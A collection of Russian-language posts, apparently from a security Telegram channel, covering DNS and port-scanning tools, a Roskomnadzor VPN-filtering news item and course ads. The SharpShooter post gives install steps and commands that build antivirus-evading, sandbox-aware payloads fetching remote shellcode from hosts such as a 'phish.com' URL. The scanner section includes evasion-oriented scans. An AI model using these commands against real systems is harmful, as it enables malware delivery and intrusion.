2️⃣ Модуль Lookup. Необработанные DNS-ответы часто не содержат нужных данных. Например, ответ MX может не включать связанные A записи в дополнительном разделе, что требует дополнительного поиска. Для устранения этого недостатка инструмент также предоставляет несколько модулей поиска: alookup, mxlookup, nslookup.

🔴alookup работает аналогично nslookup и отслеживает записи CNAME.
🔴mxlookup дополнительно выполняет поиск A для IP-адресов, соответствующих записи обмена.
🔴nslookup дополнительно выполняет поиск A/AAAA для IP-адресов, соответствующих записи NS.

echo "censys.io" | zdns mxlookup --ipv4-lookup

В выводе для данной команды будет содержаться следующая информация:

{
"name": "censys.io",
"results": {
"MXLOOKUP": {
"data": {
"exchanges": [
{
"class": "IN",
"ipv4_addresses": [
"209.85.202.27"
],
"name": "alt1.aspmx.l.google.com",
"preference": 5,
"ttl": 300,
"type": "MX"
},
{
"class": "IN",
"ipv4_addresses": [
"142.250.31.26"
],
"name": "aspmx.l.google.com",
"preference": 1,
"ttl": 300,
"type": "MX"
}
]
},
"duration": 0.154786958,
"status": "NOERROR",
"timestamp": "2024-08-23T13:10:11-04:00"
}
}
}

#tools #DNS #resolver

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Освойте UserGate и повысьте уровень защиты своей ИТ-инфраструктуры!

Бесплатный онлайн-курс поможет вам шаг за шагом освоить внедрение и настройку UserGate — без лишней теории, с упором на практику.

В программе курса:
✅ Настройка сетевых зон, NAT, VPN, кластеров, фильтрации на уровне приложений и правил межсетевого экрана
✅ Интеграция с LDAP и Active Directory, фильтрация контента, системы обнаружения вторжений и обратный прокси
✅ Пошаговые видеоуроки, практические упражнения и итоговое тестирование

По завершении курса Вы получите:
⭐ именной сертификат
📕 PDF-инструкции
📋 чек-листы и готовые конфигурации, которые помогут в дальнейшей работе

Пройдите курс в удобное время — запись уже доступна.

Реклама. ООО "ИНФРАТЕХ". ИНН 5024197250

Читать полностью…

❗️РКН будет фильтровать трафик с помощью ИИ

Роскомнадзор (РКН) планирует создать и внедрить механизм фильтрации интернет-трафика с использованием инструментов машинного обучения в этом году. На эти цели выделят 2,27 млрд рублей, следует из плана цифровизации РКН, который направлен правкомиссии по цифровому развитию. По мнению экспертов, с помощью таких инструментов РКН может научиться эффективнее блокировать запрещенные ресурсы, а также ограничивать работу VPN-сервисов.

С помощью ТСПУ уже заблокировано более 1 млн запрещенных в России ресурсов. За день ТСПУ ограничивает доступ в среднем к 5500 новых сетевых адресов и доменов, рассказывал в интервью «Известям» замглавы РКН Олег Терляков в июне 2025 года.

Инструменты машинного обучения на ТСПУ могут использоваться для разработки и автоматического применения правил фильтрации трафика, не исключает эксперт организации RKS-Global, пожелавший остаться анонимным: например, чтобы находить и блокировать трафик VPN-сервисов. Кроме того, полагает он, такие инструменты позволяют осуществлять поиск по текстам на разных языках и по изображениям и видео: «Так, Китай уже вовсю использует ИИ в мониторинге интернета».

Впрочем, не для всех систем РКН применение ИИ оказалось одинаково действенным. Так, в системе мониторинга использования персональных данных в интернете служба тестировала нейросети, но, по признанию замруководителя РКН Милоша Вагнера, их эффективность оказалась не так высока: «В тестовом режиме посмотрели на работу нейросетей, оценили их результативность в 60%. <…> Чтобы ожидаемая точность анализа повысилась <…>, нужно было составить обучающие датасеты по объемам, превосходящим мониторинг всех сайтов, который Роскомнадзор проводил за несколько лет. Такие трудозатраты в условиях необходимости экономии средств мы сочли на этом этапе преждевременными».

Источник: https://www.forbes.ru/tekhnologii/553640-algoritmiceskie-upraznenia-rkn-budet-fil-trovat-trafik-s-pomos-u-masinnogo-obucenia

#news #ркн #vpn #ии

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

💫 Перед вами — четыре снимка с мест событий, собранные в одно дело. Сможете вычислить угрозу?

1. Какой термин скрывается за этими кадрами?
2. Какой его главный и самый опасный принцип?

Включайте режим сыска. Сопоставляйте улики, стройте версии. Ваши теории ждём в комментариях!💻

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

🦈 SharpShooter

Фреймворк для создания полезных нагрузок, предназначенный для загрузки и выполнения произвольного исходного кода на C#. Инструмент может создавать полезные нагрузки в различных форматах, включая HTA, JS, VBS и WSF. Используется DotNetToJavaScript для вызова методов из сериализованного .NET-объекта SharpShooter.

Полезные нагрузки можно получать через веб или DNS, либо через оба канала одновременно. Также возможна генерация stageless полезных нагрузок со встроенным выполнением шелл-кода.

Созданные полезные нагрузки шифруются алгоритмом RC4 со случайным ключом для базового обхода антивирусов. Фреймворк также включает возможности обнаружения песочниц и привязки к окружению для повышения скрытности.

Поддерживает возможность упаковывать полезную нагрузку в HTML-файл с использованием техники Demiguise HTML smuggling.

⚡️ Установка

git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt

🦇 Использование
1️⃣Создание JavaScript-полезной нагрузки без этапов выполнения, ориентированной на версию 4 платформы .NET. В данном примере создаётся полезная нагрузка с именем foo.js в выходной директории. Шелл-код считывается из файла ./raw.txt. Полезная нагрузка пытается обеспечить обход песочницы путём привязки выполнения к домену CONTOSO и проверки на наличие известных артефактов виртуальных машин.

SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

2️⃣Создаётся VBS-полезная нагрузка, которая осуществляет доставку как через Web, так и через DNS. Полезная нагрузка попытается загрузить сжатый C#-файл, выполняющий шелл-код в файле csharpsc.txt.

SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

3️⃣Далее показано, как создать промежуточную полезную нагрузку JS, которая выполняет веб-доставку и получает полезную нагрузку с http://www.phish.com/implant.payload. Сгенерированная полезная нагрузка попытается обойти песочницу и скомпилировать полученную полезную нагрузку.

SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl

4️⃣Создаётся макрос VBA, который использует COM-интерфейс XMLDOM для получения и выполнения размещённой таблицы стилей.

SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl

P.S. Используйте этот инструмент только в образовательных целях!

#tools #payload #SharpShooter

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Unicornscan: Высокоскоростной асинхронный сканер для сетевой разведки

Unicornscan — это асинхронный инструмент для сетевой разведки и аудита безопасности, предназначенный для быстрой доставки сетевых стимулов и записи ответов. Его ключевое отличие от традиционных сканеров (таких как Nmap) — асинхронная, масштабируемая архитектура, позволяющая достигать высокой скорости сканирования (25.000+ пакетов в секунду), что делает его отличным выбором для обследования больших сетей.

🔘 Ключевые особенности и преимущества
- Отдельные процессы для отправки и прослушивания пакетов позволяют достигать высокой скорости и эффективности
- Поддержка TCP (SYN, ACK, FIN, NULL, XMAS, произвольные флаги), UDP, ICMP, ARP-сканирования и составных режимов
- Встроенная поддержка сигнатур p0f v3 для анализа характеристик TCP/IP стека и определения операционной системы удалённого хоста (более 50 отпечатков)
- Возможность эмулировать поведение TCP/IP стека различных ОС (Linux, Windows, macOS и др.) при отправке пакетов для обхода простых систем обнаружения
- Для UDP-сканирования может отправлять специфичные для служб пакеты (DNS, HTTP, SIP, SSDP), повышая точность обнаружения

➡️ Установка

sudo apt install unicornscan

Проверка

unicornscan -h

➡️ Базовый TCP SYN-скан

sudo unicornscan -mT -p 1-1024 -I -E -vvv 192.168.1.100

Команда выполнит подробное TCP SYN-сканирование портов с 1 по 1024 на хосте 192.168.1.100 с немедленным выводом в реальном времени, обработкой всех типов ответов (открытые, закрытые, фильтруемые порты) и максимальной детализацией технических параметров сетевых пакетов

➡️ Быстрый порт-сканинг с указанием интерфейса и TTL

sudo unicornscan -i eth0 -r 2000 -t 64 -p a 10.0.0.0/24

Команда выполнит быстрое сканирование всех 65 тысяч портов на всех хостах в сети 10.0.0.0/24, используя сетевой интерфейс eth0, со скоростью 2000 пакетов в секунду и значением TTL 64 для маскировки под стандартный Linux-трафик

➡️ TCP-сканирование с записью трафика для последующего анализа

unicornscan -mTsFPU -s r -w scan_capture.pcap -p 22,80,443 192.168.1.50

Команда выполнит нестандартное TCP-сканирование с флагами FIN, PSH и URG (без SYN) портов 22, 80 и 443 на хосте 192.168.1.50, используя случайные исходные порты и сохраняя все полученные ответные пакеты в файл scan_capture.pcap для последующего сетевого анализа

➡️ Ограничения
- Unicornscan создан для быстрого сбора данных (открытые порты, живые хосты, ОС). Он не заменяет полноценные сканеры уязвимостей или сложные скриптовые движки, такие как у Nmap
- Интерпретация вывода, особенно в детальном режиме, требует понимания сетевых протоколов
- Для сканирования интернет-хостов составные режимы с ARP (-mA+...) не работают, так как требуют нахождения в одном широковещательном домене (L2)

#tools #audit #scanner #TCP #UDP #SYN

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Защита от прослушки: практический взгляд без мифов

Средства негласного получения информации давно вышли за пределы спецслужб.
Диктофоны, радиопередатчики, BLE-трекеры и модифицированные устройства свободно доступны и регулярно используются в мошенничестве, корпоративных конфликтах и бытовых инцидентах.

Понимание принципов их работы — базовый навык для специалистов по безопасности, OSINT и технической разведке.

Мы подготовили PDF-гайд
«Инструкция: защита от популярных методов прослушки» — авторский материал от эксперта OSINT.

В гайде разобрано:

🟧 классификация устройств скрытого наблюдения: записывающие и транслирующие
🟧 диктофоны, радиожучки, GSM/LTE-трекеры, BLE/UWB-метки и нестандартные решения
🟧 ключевые демаскирующие признаки: питание, радиоканалы, конструктив
🟧 методы обнаружения: визуальный контроль, радиомониторинг, анализ спектра
🟧 практические способы противодействия в быту, офисе и автомобиле

Материал ориентирован на реальные сценарии, без художественных допущений и маркетинговых преувеличений.

➡️Скачать гайд бесплатно
https://wipro-guide.codeby.school/

Гайд будет полезен:
✅ специалистам ИБ и OSINT
✅ техническим и управленческим сотрудникам
✅ тем, кто работает с чувствительной информацией

В конце гайда — рекомендации по дальнейшему профессиональному развитию в области разведки и анализа данных.

➡️Перейти к гайду
https://wipro-guide.codeby.school/

Читать полностью…